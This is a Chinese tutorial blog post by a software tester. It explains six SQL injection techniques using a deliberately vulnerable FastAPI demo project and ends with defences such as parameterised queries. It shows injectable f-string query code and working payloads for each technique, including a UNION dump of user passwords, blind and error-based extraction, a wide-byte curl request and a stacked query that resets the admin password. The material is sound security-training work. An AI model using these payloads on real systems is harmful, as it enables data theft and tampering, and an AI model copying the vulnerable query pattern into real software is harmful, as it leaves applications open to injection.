安全测试:SQL注入原理与六大攻击方式

最新推荐文章于 2025-11-25 12:24:29 发布
原创 最新推荐文章于 2025-11-25 12:24:29 发布 · 715 阅读 · 28 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库 #SQL注入 #Web安全漏洞 #深度学习 #自动化测试 #职场经验

📝 面试求职: 「面试试题小程序」 ,内容涵盖 测试基础、Linux操作系统、MySQL数据库、Web功能测试、接口测试、APPium移动端测试、Python知识、Selenium自动化测试相关、性能测试、性能测试、计算机网络知识、Jmeter、HR面试,命中率杠杠的。(大家刷起来…)

📝 职场经验干货:

软件测试工程师简历上如何编写个人信息(一周8个面试)

软件测试工程师简历上如何编写专业技能(一周8个面试)

软件测试工程师简历上如何编写项目经验(一周8个面试)

软件测试工程师简历上如何编写个人荣誉(一周8个面试)

软件测试行情分享(这些都不了解就别贸然冲了.)

软件测试面试重点,搞清楚这些轻松拿到年薪30W+

软件测试面试刷题小程序免费使用(永久使用)

测试技能:SQL注入原理与六大攻击方式

公司近期出过几次安全相关的事故,于是,要求测试工程师必须在测试工作中考虑安全相关的测试。因此,我又重新开始学习安全测试技术。OWASP Top 10安全漏洞,关于注入类攻击一致名列榜首,于是,先从SQL注入开始。

什么是SQL注入?

SQL注入(SQL Injection)是一种常见的Web安全漏洞,攻击者通过在输入字段中插入恶意SQL代码,诱使后端数据库执行非预期的查询,从而获取、篡改甚至破坏数据。其根本原因在于应用程序未对用户输入进行有效过滤和转义,直接将输入拼接到SQL语句中执行。

项目简介

为了方便学习,我单独创建了一个开源项目:https://github.com/AutoTestClass/Learn-hacking-class

本项目为SQL注入演示平台,旨在帮助测试工程师理解和实践各种SQL注入攻击及其防护。平台实现了六种典型的SQL注入方式,每种方式均有对应的接口和演示页面,便于学习和测试。

六种SQL注入方式与原理

1. 联合查询注入(Union-based Injection)

原理:利用UNION关键字,将攻击者自定义的查询结果与原查询结果合并,进而获取敏感数据。

项目实现

@app.get("/union_injection/{product_id}")
def union_injection(product_id: str, db: Session = Depends(get_db)):
    query = f"SELECT id, name, price FROM products WHERE id = {product_id}"
    ...

示例攻击语句

1 UNION SELECT 1,username,password FROM users--

效果:可直接读取users表中的用户名和密码。

2. 布尔盲注(Boolean-based Blind Injection)

原理:通过构造布尔表达式,根据返回结果的真假判断数据库中的信息。适用于无错误回显的场景。

项目实现

@app.get("/boolean_blind/{input}")
def boolean_blind(input: str, db: Session = Depends(get_db)):
    query = f"SELECT username, email FROM users WHERE username = '{input}' "
    ...

示例攻击语句

admin' OR 1=1
admin' AND SUBSTRING(password,1,1)='a

效果:可逐步猜解用户名、密码等敏感信息。

3. 报错注入(Error-based Injection)

原理:利用数据库的错误信息,将敏感数据通过报错内容回显给前端。

项目实现

@app.get("/error_injection/")
def error_injection(input: str, db: Session = Depends(get_db)):
    query = f"SELECT * FROM products WHERE id = {input}"
    ...

示例攻击语句

1 AND (SELECT updatexml(1, concat(0x5c, (SELECT database())), 1))
1 AND extractvalue(1,concat(0x5c,(SELECT user())))

效果:可直接在错误信息中获取数据库名、用户名等。

4. 时间盲注(Time-based Blind Injection)

原理:通过构造包含延时函数(如SLEEP)的SQL语句,根据响应时间判断条件是否成立,进而推断数据。

项目实现

@app.get("/time_blind/{input}")
def time_blind(input: str, db: Session = Depends(get_db)):
    query = f"SELECT * FROM products WHERE id = {input}"
    ...

示例攻击语句

1 AND IF(1=1, SLEEP(3), 0)
1 AND IF(SUBSTRING((SELECT username FROM users LIMIT 1),1,1)='a', SLEEP(3), 0)

效果:通过延迟响应时间,逐步猜解敏感信息。

5. 宽字节注入(Wide-byte Injection)

原理:利用数据库编码(如GBK)特性,绕过转义机制,实现注入。常见于宽字节编码下\与多字节字符组合被“吃掉”,导致转义失效。

项目实现

@app.get("/wide_byte_injection/{input}")
def wide_byte_injection(input: str, db: Session = Depends(get_db)):
    # 检查%df%5c,模拟宽字节绕过
    ...

示例攻击语句(需终端模拟):

curl "http://127.0.0.1:8000/wide_byte_injection/%df%5c%27%20OR%201=1%23"

效果:可绕过转义,执行注入语句。

6. 堆叠查询注入(Stacked Queries Injection)

原理:通过分号;分隔,执行多条SQL语句,通常用于批量操作数据。

项目实现

@app.get("/stacked_queries/{input}")
def stacked_queries(input: str, db: Session = Depends(get_db)):
    query = f"SELECT * FROM products WHERE id = 1; {input}"
    ...

示例攻击语句

; UPDATE users SET password='hacked' WHERE username='admin'

效果:可批量修改、删除数据,危害极大。

总结

本项目通过六种典型注入方式,全面展示了SQL注入的攻击原理和危害。防护SQL注入的根本措施包括:

  • • 严格使用参数化查询(预编译语句)

  • • 对用户输入进行类型校验和转义

  • • 限制数据库账户权限

  • • 定期安全测试和代码审计

通过本平台的实践演练,测试工程师可深入理解SQL注入的本质与防御思路,为实际项目安全保驾护航。

最后: 下方这份完整的软件测试视频教程已经整理上传完成,需要的朋友们可以自行领取【保证100%免费】

​​​

网络安全CTF竞赛中SQL注入题型解析:常见攻击手法绕过技巧总结
04-20
使用场景及目标:①了解SQL注入的工作原理及危害;②掌握多种SQL注入技术的应用场景实现细节;③学会使用自动化工具提高效率;④培养解决复杂过滤条件下SQL注入问题的能力。 其他说明:本文档不仅提供了理论知识,...
SQL注入攻击实验报告
05-07
然而,由于开发者对安全性的忽视,使得许多Web应用程序存在安全隐患,其中SQL注入攻击是最常见也是最危险的一种攻击方式之一。SQL注入攻击能够使攻击者绕过正常的认证机制,获取敏感信息或控制服务器,对企业和个人...
sql注入攻击的原理sql注入攻击防范)
热门推荐
weixin_45901902的博客
08-19 3万+
SQL 注入SQLi)是一种可执行恶意 SQL 语句的注入攻击。这些 SQL 语句可控制网站背后的数据库服务。攻击者可利用 SQL 漏洞绕过网站已有的安全措施。他们可绕过网站的身份认证和授权并访问整个 SQL 数据库的数据。他们也可利用 SQL 注入对数据进行增加、修改和删除操作。 SQL 注入可影响任何使用了 SQL 数据库的网站或应用程序,例如常用的数据库有 MySQL、Oracle、SQL Server 等等。攻击者利用它,便能无需授权地访问你的敏感数据,比如:用户资料、个人数据、商业机密、知识产
SQL 注入详解:原理、危害防范措施
2301_77163982的博客
11-14 6440
SQL注入是一种常见的安全漏洞,攻击者通过在应用程序中插入恶意的SQL代码,诱使数据库执行非授权的操作。这种攻击通常发生在应用程序没有正确过滤或转义用户输入的情况下,导致攻击者能够操控数据库查询,从而获取、修改或删除数据。本文将详细介绍SQL注入原理、常见类型、潜在危害以及防范措施,帮助开发者更好地理解和应对这一安全威胁。
SQL 注入攻击中的 UNION 联合注入原理、实战防御
m0_57836225的博客
07-16 620
当应用程序在构建 SQL 查询时,将用户输入未经充分验证和清理就直接拼接到查询语句中,如果原始查询语句预期返回一个结果集,而攻击者通过构造恶意的输入,利用 UNION 操作符添加额外的查询部分,就能够将其他原本不应出现在当前查询中的数据合并到结果集中,从而达到获取敏感数据或执行未授权操作的目的。2. 确定字段数量:通过尝试不同数量的列,观察服务器的响应,以确定原始查询中选择的字段数量,以便在注入的 UNION 查询中提供相同数量的列。// 模拟用户输入,此处存在漏洞。
WebSQL注入
qq_55038440的博客
07-11 1774
对于SQL注入原理和方法进行学习,主要是联合注入,布尔注入,时间盲注等
SQL注入检测方法攻击方法
m0_73890999的博客
10-22 1209
最简单的就是使用“and 1=1”和“and 1=2”,如果会被防火墙或自身逻辑拦截,可以尝试等价方法来变换payload,无论是采用哪种payload,最终要提交一个True和False语句,判断网页返回是否相同,从而来对比该位置是否存在SQL漏洞。证明攻击者拼接的起作用,这个位置是具有SQL注入漏洞的。基于时间的注入,顾名思义就是利用时间的长短来判断SQL注入点是否存在,根据时间长短来得到SQL语句执行结果是True还是False,通过判定是否延长来证明SQL注入漏洞是否存在。
左移安全测试:在需求阶段发现SQL注入漏洞
测试者家园
08-30 1387
左移不仅能节约成本,更能让团队的安全文化融入整个SDLC(软件开发生命周期),这是可持续安全的基础。
web渗透(安全漏洞——SQL注入
m0_73747735的博客
02-21 906
sqlmap是一个开源的渗透测试工具,可以自动化检测和利用sql注入缺陷以及接管数据库服务器的过程。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。1. sqlmap超详细笔记+思维导图 - bmjoker - 博客园 (cnblogs.com)最新SQLMap安装入门技术 - FreeBuf网络安全行业门户支持的注入方式:布尔盲注、时间盲注、报错注入、联合查询、堆叠注入
SQL注入基础原理案例(详细总结)
剁椒鱼头没剁椒的博客
10-20 7652
本篇总结了学习SQL注入的笔记,暂时没总结WAF绕过方面的内容,后期会对WAF绕过进行总结。目前先总结一些基础的东西,可能有些参数不全,具体的参数或者函数可以百度搜索一下。发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。
网络安全——SQL注入实验
网络工程
12-12 5687
1、掌握SQL注入原理。2、通过开源网站渗透平台DVWA实战,掌握常见的SQL注入方法。3、具体内容:1)学习配置开源网站渗透平台DVWA(Damn Vulnerable Web Application)。2)学习常见的SQL语句:create、select、drop、union等。3)学习相关SQL注入方法并在实验平台验证。
sql注入字典fuzz
01-11
在网络安全领域,SQL注入攻击是一种常见的威胁方式,它利用数据库应用系统中的漏洞,通过恶意构造的SQL语句来获取敏感数据或对数据库进行非法操作。为了有效地检测和防范此类攻击,安全研究人员和工程师们常常会采用...
mybatis 是如何防止 sql 注入
ThisIsMirror的博客
11-24 885
MyBatis 防 SQL 注入的核心是优先使用#{}占位符(依赖 JDBC 预编译),从根源上隔离用户输入和 SQL 语法;对于必须使用${}的场景,通过「白名单校验+手动转义」限制输入;配合类型校验、数据库权限控制等兜底机制,形成完整防护。凡是用户输入的内容,一律用#{}接收;动态表名、排序字段等非用户输入场景,用${}并严格校验,就能避免 99% 以上的 SQL 注入风险。
SQL Server所有数据类型大全
2509_94081922的博客
11-22 608
【代码】SQL Server所有数据类型大全。
mysql 迁移达梦数据库出现的 sql 语法问题 以及迁移方案
2509_94010201的博客
11-24 586
Copy CodeMySQL: DATE_FORMAT( a.expiry_date, ‘%Y-%m-%d %H:%M:%S’ ) 达梦: TO_CHAR(a.expiry_date, ‘YYYY-MM-DD HH24:MI:SS’)MySQL: DATE_FORMAT( a.expiry_date, ‘%Y-%m-%d %H:%M:%S’ ) 达梦: TO_CHAR(a.expiry_date, ‘YYYY-MM-DD HH24:MI:SS’)另外,在某些函数和操作符的使用上也有一些差异。
gotool.top 的 SQL 转 Markdown
最新发布
A__tao的博客
11-25 689
无需授权无需下载插件浏览器打开就能直接用,这一点对我来说非常加分。如果你是后端开发、数据库工程师,或需要经常写技术文档的人,我非常推荐试试这个工具。它帮你把繁琐的 SQL 文档整理自动化,让你能把更多精力花在业务逻辑和系统设计上。用一句话总结:它不是改变世界的工具,但绝对是能让开发更舒服的工具。
Spring Boot 中使用 @Transactional 注解配置事务管理
2509_94007314的博客
11-21 1446
下面分别介绍一下的几个属性。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值